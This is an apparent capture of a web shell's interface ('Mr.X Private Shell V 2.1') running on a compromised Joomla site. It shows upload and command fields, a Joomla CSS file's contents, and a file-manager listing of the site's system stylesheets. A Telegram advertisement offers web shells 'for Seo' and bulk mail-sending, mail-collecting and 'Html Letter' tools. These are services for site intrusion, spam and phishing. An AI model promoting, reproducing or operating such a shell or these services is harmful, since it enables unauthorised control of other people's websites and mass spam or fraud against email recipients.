__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
:host {
  position: fixed;
  top: 0;
  left: 0;
  z-index: 10000;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
      -ms-flex-align: center;
          align-items: center;
  width: 100%;
  height: 100%;
  overflow: hidden;
  opacity: 0.8;
}

.box {
  position: relative;
  width: 345px;
  height: 345px;
  margin: 0 auto;
}
.box p {
  float: right;
  margin: 95px 0 0;
  font: normal 1.25em/1em sans-serif;
  color: #999;
}
.box > span {
  -webkit-animation: jspinner 2s infinite ease-in-out;
          animation: jspinner 2s infinite ease-in-out;
}
.box .red {
  -webkit-animation-delay: -1.5s;
          animation-delay: -1.5s;
}
.box .blue {
  -webkit-animation-delay: -1s;
          animation-delay: -1s;
}
.box .green {
  -webkit-animation-delay: -0.5s;
          animation-delay: -0.5s;
}

.yellow {
  position: absolute;
  top: 0;
  left: 0;
  width: 90px;
  height: 90px;
  content: "";
  background: #f9a541;
  border-radius: 90px;
}
.yellow::before, .yellow::after {
  position: absolute;
  top: 0;
  left: 0;
  -webkit-box-sizing: content-box;
          box-sizing: content-box;
  width: 50px;
  content: "";
  background: transparent;
  border: 50px solid #f9a541;
}
.yellow::before {
  height: 35px;
  margin: 60px 0 0 -30px;
  border-width: 50px 50px 0;
  border-radius: 75px 75px 0 0;
}
.yellow::after {
  height: 105px;
  margin: 140px 0 0 -30px;
  border-width: 0 0 0 50px;
}

.red {
  position: absolute;
  top: 0;
  left: 0;
  width: 90px;
  height: 90px;
  content: "";
  background: #f44321;
  border-radius: 90px;
}
.red::before, .red::after {
  position: absolute;
  top: 0;
  left: 0;
  -webkit-box-sizing: content-box;
          box-sizing: content-box;
  width: 50px;
  content: "";
  background: transparent;
  border: 50px solid #f44321;
}
.red::before {
  height: 35px;
  margin: 60px 0 0 -30px;
  border-width: 50px 50px 0;
  border-radius: 75px 75px 0 0;
}
.red::after {
  height: 105px;
  margin: 140px 0 0 -30px;
  border-width: 0 0 0 50px;
}

.blue {
  position: absolute;
  top: 0;
  left: 0;
  width: 90px;
  height: 90px;
  content: "";
  background: #5091cd;
  border-radius: 90px;
}
.blue::before, .blue::after {
  position: absolute;
  top: 0;
  left: 0;
  -webkit-box-sizing: content-box;
          box-sizing: content-box;
  width: 50px;
  content: "";
  background: transparent;
  border: 50px solid #5091cd;
}
.blue::before {
  height: 35px;
  margin: 60px 0 0 -30px;
  border-width: 50px 50px 0;
  border-radius: 75px 75px 0 0;
}
.blue::after {
  height: 105px;
  margin: 140px 0 0 -30px;
  border-width: 0 0 0 50px;
}

.green {
  position: absolute;
  top: 0;
  left: 0;
  width: 90px;
  height: 90px;
  content: "";
  background: #7ac143;
  border-radius: 90px;
}
.green::before, .green::after {
  position: absolute;
  top: 0;
  left: 0;
  -webkit-box-sizing: content-box;
          box-sizing: content-box;
  width: 50px;
  content: "";
  background: transparent;
  border: 50px solid #7ac143;
}
.green::before {
  height: 35px;
  margin: 60px 0 0 -30px;
  border-width: 50px 50px 0;
  border-radius: 75px 75px 0 0;
}
.green::after {
  height: 105px;
  margin: 140px 0 0 -30px;
  border-width: 0 0 0 50px;
}

.yellow {
  margin: 0 0 0 255px;
  -webkit-transform: rotate(45deg);
          transform: rotate(45deg);
}

.red {
  margin: 255px 0 0 255px;
  -webkit-transform: rotate(135deg);
          transform: rotate(135deg);
}

.blue {
  margin: 255px 0 0;
  -webkit-transform: rotate(225deg);
          transform: rotate(225deg);
}

.green {
  -webkit-transform: rotate(315deg);
          transform: rotate(315deg);
}

@-webkit-keyframes jspinner {
  0%, 40%, 100% {
    opacity: 0.3;
  }
  20% {
    opacity: 1;
  }
}

@keyframes jspinner {
  0%, 40%, 100% {
    opacity: 0.3;
  }
  20% {
    opacity: 1;
  }
}
@media (prefers-reduced-motion: reduce) {
  .box > span {
    -webkit-animation: none;
            animation: none;
  }
}

Filemanager

Name Type Size Permission Actions
fields Folder 0775
calendar-jos.css File 3.86 KB 0664
calendar-jos.min.css File 1.89 KB 0664
calendar-jos.min.css.gz File 584 B 0664
debug.css File 3.35 KB 0664
debug.min.css File 2.57 KB 0664
debug.min.css.gz File 760 B 0664
editor.css File 1.22 KB 0664
editor.min.css File 819 B 0664
editor.min.css.gz File 456 B 0664
frontediting.css File 476 B 0664
frontediting.min.css File 179 B 0664
frontediting.min.css.gz File 132 B 0664
joomla-core-loader.css File 3.84 KB 0664
joomla-core-loader.min.css File 2.92 KB 0664
joomla-core-loader.min.css.gz File 744 B 0664
joomla-fontawesome.css File 92.31 KB 0664
joomla-fontawesome.min.css File 74.11 KB 0664
joomla-fontawesome.min.css.gz File 15.08 KB 0664
joomla-toolbar-button.css File 105 B 0664
joomla-toolbar-button.min.css File 97 B 0664
joomla-toolbar-button.min.css.gz File 83 B 0664
mootree.css File 492 B 0664
mootree.min.css File 260 B 0664
mootree.min.css.gz File 202 B 0664
mootree_rtl.css File 195 B 0664
mootree_rtl.min.css File 25 B 0664
mootree_rtl.min.css.gz File 45 B 0664
sortablelist.css File 2.9 KB 0664
sortablelist.min.css File 1.93 KB 0664
sortablelist.min.css.gz File 651 B 0664
system-admin-error.css File 815 B 0664
system-admin-error.min.css File 504 B 0664
system-admin-error.min.css.gz File 280 B 0664
system-admin-system.css File 1.23 KB 0664
system-admin-system.min.css File 756 B 0664
system-admin-system.min.css.gz File 299 B 0664
system-site-error.css File 1.41 KB 0664
system-site-error.min.css File 911 B 0664
system-site-error.min.css.gz File 407 B 0664
system-site-error_rtl.css File 318 B 0664
system-site-error_rtl.min.css File 83 B 0664
system-site-error_rtl.min.css.gz File 76 B 0664
system-site-general.css File 2.68 KB 0664
system-site-general.min.css File 1.97 KB 0664
system-site-general.min.css.gz File 641 B 0664
system-site-offline.css File 1.96 KB 0664
system-site-offline.min.css File 1.2 KB 0664
system-site-offline.min.css.gz File 544 B 0664
system-site-offline_rtl.css File 539 B 0664
system-site-offline_rtl.min.css File 170 B 0664
system-site-offline_rtl.min.css.gz File 138 B 0664
Filemanager